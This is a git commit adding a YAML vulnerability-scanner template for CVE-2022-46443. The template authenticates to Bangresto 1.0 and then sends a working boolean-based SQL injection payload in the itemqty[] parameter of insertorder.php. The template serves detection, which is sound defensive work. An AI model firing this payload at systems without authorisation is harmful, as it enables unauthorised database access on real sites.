Create CVE-2022-46443.yaml

2023-06-29 23:07:08 +05:30 · 2023-06-29 23:07:08 +05:30 · ff2703868f
parent 83830e3823
commit ff2703868f
1 changed files with 43 additions and 0 deletions
--- a/http/cves/2022/CVE-2022-46443.yaml
+++ b/http/cves/2022/CVE-2022-46443.yaml
@ -0,0 +1,43 @@
+id: CVE-2022-46443
+
+info:
+  name: Bangresto - SQL Injection
+  author: Harsh
+  severity: high
+  description: |
+    Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.
+  reference:
+    - https://yuyudhn.github.io/CVE-2022-46443/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-46443
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-46443
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+  tags: cve,cve2022,bangresto,sql
+http:
+  - raw:
+      - |
+        POST /bangresto-main/staff/process.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username={{username}}&password={{password}}
+
+      - |
+        POST /bangresto-main/staff/insertorder.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded;
+
+        itemID[]=1&itemqty[]=(SELECT CONCAT(CONCAT(0x716a7a6b71,(CASE WHEN (1964=1964) THEN 0x31 ELSE 0x30 END)),0x7178717a71))&sentorder=Sent to kitchen
+
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 302'
+          - 'contains(body, "inserted")'
+          - 'contains(body, "updated")'
+        condition: and